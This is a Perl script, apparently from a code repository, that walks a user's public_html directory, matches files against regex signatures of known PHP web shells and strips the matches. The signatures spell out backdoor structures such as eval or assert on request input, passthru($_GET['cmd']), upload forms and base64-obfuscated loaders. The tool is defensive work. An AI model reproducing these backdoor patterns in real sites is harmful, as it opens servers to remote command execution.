qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\=\/\*([A-z0-9_]{1,20})\*\/\"asser\"\.\"t\";\$([A-z0-9_]{1,20})=\$k\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if \(isset\(\$\{\"_REQUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\$([A-z0-9_]{1,20})\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php.+?function decrypt\(\$str\,\$pwd\)\{\$pwd=base64_encode\(\$pwd\);\$str=base64_decode\(.+?call_user_func\(\'action\' \. \$_POST\[\'a\'\]\);\s+\?>/is,
qr/<\!\-\- HTML And JavaScript \-\->.+?Rebels Mailer.+?<\/span>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+if\(isset\(\$_GET\[\"up\"\]\)\)\{echo\"<font color=\#FFFFFF>\[uname\]\"\.php_uname\(\)\.\"\[\/uname\]\";echo\"<br><font color=\#FFFFFF>\[dir\]\"\.getcwd\(\)\.\"\[\/dir\]\";echo\"<form method=post enctype=multipart\/form-data>\";echo\"<input type=file name=f><input name=v type=submit id=v value=up><br>\";if\(\$_POST\[\"v\"\]==up\)\{if\(\@copy\(\$_FILES\[\"f\"\]\[\"tmp_name\"\]\,\$_FILES\[\"f\"\]\[\"name\"\]\)\)\{echo\"<b>Success<\/b>\-\->\"\.\$_FILES\[\"f\"\]\[\"name\"\];\}else\{echo\"<b>Failed\";\}\}\}\s+\?>/is,
qr/<\?php\s+\@ini_set\(\'display_errors\', \'0\'\);.+?\$bad_agents = \'\~google.+?\@include\(\"\{\$eb\}\.\$algo\"\);\s+\}\s+\}\s+\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)die\(pi\(\)\*6\);\$GLOBALS\[\'.+?\)\)\);if\(isset\(\$_1\)\)\{\@eval\(\$_1\);exit\(\);\}\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$except\(stripslashes\(\$internal\)\) \&\& exit; if\(\!class_exists\(\'Ratel\'\)\).+?\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$system\(stripslashes\(\$catch\)\) \&\& exit;/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$pass\(stripslashes\(\$not\)\) \&\& exit; if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"assert\";\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$lock\(stripslashes\(\$request\)\) \&\& exit; if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$request\(stripslashes\(\$catch\)\) \&\& exit; if\(\!class_exists\(\'Ratel\'\)\)\{.+?\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$internal\(stripslashes\(\$user\)\) \&\& exit;\s+if \(\!class_exists\(\'Ratel\'\)\) \{.+?\$ratel->init\(\$ruri, \$host, \$is_bot\);\s+\}\s+\?>/is,
qr/\@ini_set\(\'display_errors\', \'0\'\);\s+error_reporting\(0\);\s+\$skipme = false;\s+\$bad_agents = \'\~google.+?register_shutdown_function\(\'ob_end_flush\'\);\s+\}\s+\}\s+\?>/is,
qr/if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php.+?if\(\!function_exists\(.+?=base64_decode\(\$.+?=\(ord\(\$.+?\"\)\);\?>/is,
qr/<\?php\s+\$.+?eval\(base64_decode\(gzuncompress\(base64_decode\(\$.+?\)\)\)\);\?>/is,
qr/<\?php \$__FILE__=__FILE__;\$__X__=\'.+?\)\);unset\(\$__X__\);unset\(\$__FILE__\); \?>/is,
qr/<\?php \/\*\*\* WebShellOrb 2\.6 - With PHP 7 \*\*\*\/ \$.+?=file\(\_\_FILE\_\_\);eval\(base64_decode\(\"aWYo.+?\)\)\);\_\_halt_compiler\(\);aWYo.+?\+fwE=/is,
qr/<\?php\s+error_reporting\(0\);.+?Database Emails Extractor By SparkyDz.+?return \$result;\s+\}\s+\?>/is,
qr/<\?php passthru\(\$_GET\[\'cmd\'\]\); \?>/is,
qr/<\?php.+?\$url = \"\(B\)\/\(C\)\-\(A\)\.html\";.+?0=urldecode\(\"\%6.+?\)\);\s+\?>/is,
qr/<\?php if\(\$_GET\[\'l\'\]\)\{\@move_uploaded_file\(\$_FILES\[\'f\'\]\[\'tmp_name\'.+?<\/form>\'; \?>/is,
qr/<\?php if\(\$_GET\[\"\\x6c\"\]\)\{\@move_uploaded_file\(\$_FILES\[.+?<\/f\\x6frm>\"; \?>/is,
);
my @base64_decodes = (
);
my @file_list;
my %possible_list;
my $start_dir = "/home/$user/public_html/";
$start_dir =~ s/\/cgi-bin//;
$start_dir =~ s/\/lp-msh-scanner//;
$start_dir = substr($start_dir, 0, rindex($start_dir, '/'));
dir ($start_dir);
print "\n\n";
print 'Infected Files CLEANED (' . scalar(@file_list) . "):\n";
foreach my $file (@file_list) {
print "$file\n";
}
print "\n\n";
print 'Possibly Infected Files (' . scalar(keys(%possible_list)) . "):\n";
foreach my $key (keys(%possible_list)) {
print "$key => $possible_list{$key}\n";
}
sub dir {
my ($start_dir) = @_;
unless (opendir(DIR, $start_dir)) {
print "Skipping directory $start_dir: $! ";
return;
}
opendir(DIR, $start_dir) || die "$start_dir: $!";
my @files = grep {-T "$start_dir\/$_"} readdir(DIR);
closedir DIR;
opendir(DIR, $start_dir) || die "$start_dir: $!";
my @folders = grep {-d "$start_dir\/$_"} readdir(DIR);
closedir DIR;
foreach my $file (sort @files) {
next if $file eq 'error_log';
print "Scanning $start_dir/$file... ";
unless (-r "$start_dir/$file") {
print " Skipping file, unable to read file\n";
next
}
if ((-s "$start_dir/$file") > 1024000) {
print " Skipping file, over 1MB\n";
next
}
my $fh;
unless (open ($fh, '<', "$start_dir/$file")) {
print " Unable to read file, $!\n";
next
}
my $contents = do { local $/; <$fh> };
close $fh;
my ($infected, $cleaned, $possible, $known, $sig);
foreach my $pattern (@regexen) {
my $t;
if ($contents =~ /$pattern/) {
my ($d, $t) = ($1, $2);
$infected = 1;
($contents, $cleaned) = clean_file("$start_dir/$file", $contents, $pattern);
push (@file_list, "$start_dir/$file");
}
$t = undef;
}
print $infected ? ($cleaned ? "Infected, Cleaned\n" : "Infected, Cleaning failed\n") : ($possible ? "Possibly Infected\nSignature Unknown: $sig\n" : "Not infected\n");
}
foreach my $folder (sort @folders) {
if ($folder !~ /^\.\.?$/) {
dir("$start_dir/$folder");
}
}
}
sub clean_file {
my ($file, $contents, $pattern) = @_;
my $cleaned;
if ($contents =~ /\n{4}/) {
$contents =~ s/\n\n/\n/g;
}
$contents =~ s/$pattern//g;
if ($contents =~ /$pattern/) {
$cleaned = 0;
}
else {
open (my $fh, '>', $file);
print $fh $contents;
close $fh;
$cleaned = 1;
}
return ($contents, $cleaned);
}
1;
Reference in New Issue View Git Blame Copy Permalink